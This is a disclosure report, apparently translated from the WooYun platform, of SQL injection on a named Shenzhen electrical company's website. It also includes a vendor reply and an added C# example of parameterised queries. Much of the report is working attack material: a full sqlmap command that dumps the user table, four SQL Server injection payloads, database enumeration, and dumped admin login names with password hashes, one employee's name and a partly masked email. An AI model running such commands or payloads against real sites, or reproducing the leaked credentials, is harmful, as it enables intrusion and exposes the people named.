
Vulnerability Summary

Defect ID: wooyun-2015-0153229

Title: A site of Shenzhen Sine Electric Co., Ltd. (深圳市正弦电气股份有限公司) has a SQL injection vulnerability (70,000 system backup records leaked / 130,000 system messages leaked / user passwords, e-mail addresses, login IPs and other information leaked)

Vendor: Shenzhen Sine Electric Co., Ltd. (深圳市正弦电气股份有限公司)

Author: 路人甲

Submitted: 2015-11-10 10:44

Fixed: 2015-12-26 15:02

Published: 2015-12-26 15:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-10: Details reported to the vendor; awaiting vendor handling
2015-11-11: Vendor has confirmed; details visible to the vendor only
2015-11-21: Details disclosed to core white hats and experts in related fields
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to intern white hats
2015-12-26: Details disclosed to the public

Brief description:

Shenzhen Sine Electric Co., Ltd. was founded in April 2003 with registered capital of 64.5 million yuan.
The company focuses on the research, development, production and sale of electrical drive and automation products, serving mid- to high-end equipment manufacturers and system integrators.
Sine Electric is a national high-tech enterprise and a well-known Shenzhen brand; it pursues a strategy of technical leadership and product innovation, tailors dedicated products and solutions for its customers, and aims to lead its niche markets.
The company continuously strengthens its overall competitiveness, emphasises independent technical innovation, recruits and retains high-end technical talent over the long term, adopts internationally advanced operations and R&D management processes, and enforces strict quality process control.
It owns large-scale advanced inspection and testing, laboratory and production equipment, fully capable of developing, testing and producing low- and medium-voltage industrial control products, with annual capacity exceeding 120,000 units. Its inverters, servos, integrated controllers and other products have won many awards, enjoy a strong reputation in the mainland China market, and are exported to Southeast Asia, the Middle East, Russia and elsewhere.
All products are the company's own intellectual property, have passed inspection and product registration by national authorities, carry CE certification, and the quality management system is ISO9001 certified.
The company has set up 4 warehousing and logistics centres, 12 regional service centres and 19 sales offices nationwide, staffed by resident sales personnel and technical service engineers, to provide customers with professional and convenient service.

Details:

URL: http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43

python sqlmap.py -u "http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43" -p lcid --technique=BEQU --random-agent --batch -D sq_sinee2013hk -T Whir_Sec_Users -C LoginName,Password,UserId,Email,RealName,LastLoginIP --dump


Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 70009 |


Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |

Proof of vulnerability:

Database: sq_sinee2013hk
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Whir_Cmn_Area | 3260 |
| sq_sinee2013HK.Whir_Cmn_Area | 3260 |
| sq_sinee2013HK.Whir_Sec_Resources | 1015 |
| dbo.Whir_Sec_Resources | 1011 |
| sq_sinee2013HK.Whir_Ext_Upload | 859 |
| sq_sinee2013HK.Whir_U_Jobs_JobRequest | 751 |
| dbo.Whir_Ext_Upload | 708 |
| dbo.Whir_Dev_Field | 612 |
| sq_sinee2013HK.Whir_Dev_Field | 612 |
| dbo.Whir_U_Jobs_JobRequest | 511 |
| dbo.Whir_Sec_RolesInResources | 380 |
| dbo.Whir_Sec_RolesInResources | 380 |
| sq_sinee2013HK.Whir_Sec_RolesInResources | 380 |
| sq_sinee2013HK.Whir_Sec_RolesInResources | 380 |
| sq_sinee2013HK.Whir_U_Content_Bak | 374 |
| sq_sinee2013HK.Whir_U_Content_Bak | 374 |
| dbo.Whir_U_Content_Bak | 268 |
| dbo.Whir_U_Content_Bak | 268 |
| sq_sinee2013HK.Whir_U_Product_Bak | 198 |
| sq_sinee2013HK.Whir_U_Product_Bak | 198 |
| sq_sinee2013HK.Whir_U_SinglePage_Bak | 131 |
| sq_sinee2013HK.Whir_U_SinglePage_Bak | 131 |
| dbo.Whir_Dev_FormDate | 128 |
| sq_sinee2013HK.Whir_Dev_FormDate | 128 |
| dbo.Whir_Dev_Menu | 127 |
| sq_sinee2013HK.Whir_Dev_Menu | 127 |
| dbo.Whir_U_SinglePage_Bak | 125 |
| dbo.Whir_U_SinglePage_Bak | 125 |
| sq_sinee2013HK.Whir_U_SalesNet_Bak | 114 |
| sq_sinee2013HK.Whir_U_SalesNet_Bak | 114 |
| dbo.Whir_U_Product_Bak | 112 |
| dbo.Whir_U_Product_Bak | 112 |
| sq_sinee2013HK.Whir_U_Download_Bak | 112 |
| sq_sinee2013HK.Whir_U_Download_Bak | 112 |
| dbo.Whir_U_Download_Bak | 73 |
| dbo.Whir_U_Download_Bak | 73 |
| dbo.Whir_Dev_Column | 72 |
| sq_sinee2013HK.Whir_Dev_Column | 72 |
| dbo.Whir_U_SalesNet_Bak | 58 |
| dbo.Whir_U_SalesNet_Bak | 58 |
| dbo.Whir_U_Product_Category | 44 |
| sq_sinee2013HK.Whir_U_Product_Category | 44 |
| dbo.Whir_Dev_FormOption | 42 |
| dbo.Whir_Dev_FormUpload | 42 |
| sq_sinee2013HK.Whir_Dev_FormOption | 42 |
| sq_sinee2013HK.Whir_Dev_FormUpload | 42 |
| dbo.Whir_Dev_ConfigStrategy | 37 |
| dbo.Whir_Dev_Module | 37 |
| sq_sinee2013HK.Whir_Dev_ConfigStrategy | 37 |
| sq_sinee2013HK.Whir_Dev_Module | 37 |
| sq_sinee2013HK.Whir_U_Content_Category | 36 |
| dbo.Whir_Dev_Model | 32 |
| sq_sinee2013HK.Whir_Dev_Model | 32 |
| dbo.Whir_U_Content_Category | 31 |
| dbo.Whir_U_Download_Category | 18 |
| sq_sinee2013HK.Whir_U_Download_Category | 17 |
| dbo.Whir_U_Jobs_Category | 12 |
| sq_sinee2013HK.Whir_U_Jobs_Category | 12 |
| dbo.Whir_Cnt_WorkFlowLogs | 11 |
| sq_sinee2013HK.Whir_Cnt_WorkFlowLogs | 11 |
| dbo.Whir_U_Jobs_Bak | 10 |
| dbo.Whir_U_Jobs_Bak | 10 |
| sq_sinee2013HK.Whir_U_Jobs_Bak | 10 |
| sq_sinee2013HK.Whir_U_Jobs_Bak | 10 |
| sq_sinee2013HK.Whir_U_Links_Bak | 10 |
| sq_sinee2013HK.Whir_U_Links_Bak | 10 |
| dbo.Whir_U_Links_Bak | 9 |
| dbo.Whir_U_Links_Bak | 9 |
| dbo.Whir_Dev_SubmitForm | 6 |
| sq_sinee2013HK.Whir_Dev_SubmitForm | 6 |
| dbo.Whir_Sec_Users | 4 |
| sq_sinee2013HK.Whir_Sec_Users | 4 |
| dbo.Whir_Cnt_Attached | 2 |
| dbo.Whir_Ext_Gather | 2 |
| dbo.Whir_Sit_SiteInfo | 2 |
| sq_sinee2013HK.Whir_Cnt_Attached | 2 |
| sq_sinee2013HK.Whir_Ext_Gather | 2 |
| sq_sinee2013HK.Whir_Sit_SiteInfo | 2 |
| dbo.Whir_Ext_AuditActivity | 1 |
| dbo.Whir_Ext_WorkFlow | 1 |
| sq_sinee2013HK.Whir_Ext_AuditActivity | 1 |
| sq_sinee2013HK.Whir_Ext_WorkFlow | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 10642 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.trace_event_bindings | 3958 |
| sys.all_columns | 3740 |
| sys.system_columns | 3696 |
| sys.syscomments | 2744 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1747 |
| sys.sysobjects | 1747 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1641 |
| sys.syspermissions | 1641 |
| sys.sysprotects | 1640 |
| sys.all_sql_modules | 1589 |
| sys.system_sql_modules | 1589 |
| sys.database_recovery_status | 286 |
| sys.databases | 286 |
| sys.sysdatabases | 286 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.dm_db_partition_stats | 101 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.fulltext_languages | 17 |
| sys.xml_schema_component_placements | 17 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.database_principals | 14 |
| sys.schemas | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.service_queue_usages | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 70009 |
| dbo.backupset | 35004 |
| dbo.backupmediafamily | 1995 |
| dbo.backupmediaset | 1994 |
| dbo.restorefilegroup | 372 |
| dbo.restorefilegroup | 372 |
| dbo.restorehistory | 372 |
| dbo.suspect_pages | 3 |
+--------------------------------------------------+---------+


Database: msdb
Table: backupfile
[25 columns]
+------------------------+------------------+
| Column | Type |
+------------------------+------------------+
| backed_up_page_count | numeric |
| backup_set_id | int |
| backup_size | numeric |
| create_lsn | numeric |
| differential_base_guid | uniqueidentifier |
| differential_base_lsn | numeric |
| drop_lsn | numeric |
| file_guid | uniqueidentifier |
| file_number | numeric |
| file_size | numeric |
| file_type | char |
| filegroup_guid | uniqueidentifier |
| filegroup_name | nvarchar |
| first_family_number | tinyint |
| first_media_number | smallint |
| is_present | bit |
| is_readonly | bit |
| logical_name | nvarchar |
| page_size | int |
| physical_drive | nvarchar |
| physical_name | nvarchar |
| read_only_lsn | numeric |
| read_write_lsn | numeric |
| source_file_block_size | numeric |
| state_desc | nvarchar |
+------------------------+------------------+


Database: sq_sinee2013hk
Table: Whir_Sec_Users
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CreateDate | datetime |
| CreateUser | nvarchar |
| Email | nvarchar |
| IsDel | bit |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LoginName | nvarchar |
| LoginType | nvarchar |
| Password | nvarchar |
| RealName | nvarchar |
| Remarks | nvarchar |
| RolesId | int |
| Sort | bigint |
| State | int |
| SystemLanguage | int |
| SystemSkin | nvarchar |
| UpdateDate | datetime |
| UpdateUser | nvarchar |
| UserId | int |
+----------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lcid (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: itemid=35&lcid=(SELECT (CASE WHEN (8371=8371) THEN 8371 ELSE 8371*(SELECT 8371 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: itemid=35&lcid=43 AND 8230=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8230=8230) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: itemid=35&lcid=(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1615=1615) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113))
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: itemid=35&lcid=43 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(101)+CHAR(67)+CHAR(115)+CHAR(112)+CHAR(121)+CHAR(118)+CHAR(67)+CHAR(85)+CHAR(113)+CHAR(71)+CHAR(113)+CHAR(69)+CHAR(90)+CHAR(107)+CHAR(84)+CHAR(75)+CHAR(119)+CHAR(80)+CHAR(115)+CHAR(118)+CHAR(88)+CHAR(78)+CHAR(102)+CHAR(90)+CHAR(106)+CHAR(90)+CHAR(97)+CHAR(115)+CHAR(69)+CHAR(76)+CHAR(75)+CHAR(72)+CHAR(65)+CHAR(79)+CHAR(100)+CHAR(97)+CHAR(82)+CHAR(88)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL-- -
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
Database: sq_sinee2013hk
Table: Whir_Sec_Users
[4 entries]
+-----------+------------------------------------------+--------+--------------------+----------+----------------+
| LoginName | Password | UserId | Email | RealName | LastLoginIP |
+-----------+------------------------------------------+--------+--------------------+----------+----------------+
| admin | EED5873ACF981C43FE65257D87351443A50470AC | 6 | <blank> | 超级管理员 | **.**.**.** |
| sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |
| sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |
| sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |
+-----------+------------------------------------------+--------+--------------------+----------+----------------+

Remediation:

Add filtering.
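As an added illustration that is not part of the original report, the following shows the vulnerable pattern behind an endpoint like info_3.aspx?itemid=35&lcid=43 (query-string values concatenated into SQL) beside a parameterised version, which removes the injection rather than trying to filter it. The table and column names are assumptions for illustration, not taken from the report.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical data-access code for a page like info_3.aspx?itemid=35&lcid=43.
// The table and column names (Whir_U_Content, ItemId, LcId, Title, Body) are
// assumptions for illustration, not taken from the report.
public static class InfoPageData
{
    // Vulnerable pattern: query-string values pasted into the SQL text.
    // lcid=43 AND 1=CONVERT(INT,...) simply becomes part of the WHERE clause,
    // which is what the boolean-, error- and UNION-based payloads above rely on.
    public static DataTable LoadVulnerable(SqlConnection conn, string itemId, string lcid)
    {
        string sql = "SELECT Title, Body FROM Whir_U_Content WHERE ItemId=" + itemId
                   + " AND LcId=" + lcid;
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
        {
            DataTable result = new DataTable();
            adapter.Fill(result);
            return result;
        }
    }

    // Hardened pattern: both values must parse as integers and are bound as typed
    // parameters, so the statement text is constant and user input is only ever data.
    public static DataTable LoadSafe(SqlConnection conn, string itemId, string lcid)
    {
        int itemIdValue, lcidValue;
        if (!int.TryParse(itemId, out itemIdValue) || !int.TryParse(lcid, out lcidValue))
        {
            throw new ArgumentException("itemid and lcid must be integers");
        }
        const string sql =
            "SELECT Title, Body FROM Whir_U_Content WHERE ItemId=@itemId AND LcId=@lcId";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@itemId", SqlDbType.Int).Value = itemIdValue;
            cmd.Parameters.Add("@lcId", SqlDbType.Int).Value = lcidValue;
            using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
            {
                DataTable result = new DataTable();
                adapter.Fill(result);
                return result;
            }
        }
    }
}
```

Separately, the msdb and master enumeration above shows that the site's database login could read server-wide tables; restricting that login to the application database alone limits what any future injection can reach.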

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-11 15:00

Vendor reply:

Thank you very much for your report.
The issue described in the report has been confirmed and reproduced.
Affected data: high
Attack cost: low
Impact: high
Overall rating: high, rank: 10
We are contacting the administrator of the affected website to handle it.

Latest status:

None